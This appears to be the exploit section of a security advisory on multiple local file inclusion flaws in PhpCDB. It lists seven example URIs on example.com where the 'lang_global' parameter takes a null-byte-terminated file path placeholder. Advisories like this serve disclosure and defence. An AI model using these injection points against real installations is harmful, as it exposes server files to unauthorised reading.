• info
• discussion
• exploit
• solution
• references

PhpCDB 'lang_global' Parameter Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/firstvisit.php?lang_global=[LFI%00]
http://www.example.com/newfolder.php?lang_global=[LFI%00]
http://www.example.com/showfolders.php?lang_global=[LFI%00]
http://www.example.com/newlang.php?lang_global=[LFI%00]
http://www.example.com/showinnerfolder.php?lang_global=[LFI%00]
http://www.example.com/writecode.php?lang_global=[LFI%00]
http://www.example.com/showcode.php?lang_global=[LFI%00]